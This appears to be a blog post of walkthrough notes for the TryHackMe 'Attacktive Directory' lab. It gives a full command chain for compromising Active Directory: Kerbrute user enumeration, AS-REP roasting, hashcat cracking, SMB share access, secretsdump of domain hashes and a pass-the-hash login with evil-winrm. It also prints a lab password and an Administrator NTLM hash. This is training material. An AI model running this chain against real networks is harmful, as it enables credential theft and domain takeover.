Home THM Attacktive Directory
Post
Cancel

THM Attacktive Directory

install Impacket

1
2
3
git clone https://github.com/SecureAuthCorp/impacket.git /opt/impacket
pip3 install -r /opt/impacket/requirements.txt
cd /opt/impacket/ && python3 ./setup.py install

Installing Bloodhound and Neo4j

1
apt install bloodhound neo4j

nmap

1
nmap -sC -sV -oA nmap.out 10.10.222.186

Kerbrute

  • based on Impacket

Enumerate users

1
./kerbrute_linux_amd64 userenum  -d spookysec.local --dc 10.10.156.79  /home/kali/Desktop/userlist.txt  

GetNPUsers.py

  • an Impacket tool
  • ASReproasting occurs when a user account has the privilege “Does not require Pre-Authentication” set.
1
python3 /opt/impacket/examples/GetNPUsers.py spookysec.local/svc-admin

find hash type

bruteforce hash

1
hashcat -m 18200 ./svcHash /home/kali/Desktop/passwordlist.txt  --force

smbclient

list shares

1
smbclient --user svc-admin -L 10.10.30.17

connect to one share named “backup”

1
smbclient //10.10.30.17/backup --user svc-admin

backup@spookysec.local:backup2517860

secretsdump.py

understanding windows hash

1
python3 secretsdump.py  backup@10.10.30.17 -just-dc

pass the hash attack

evil-winrm login

1
evil-winrm -i 10.10.30.17 -u Administrator -H 0e0363213e37b94221497260b0bcb4fc
This post is licensed under CC BY 4.0 by the author.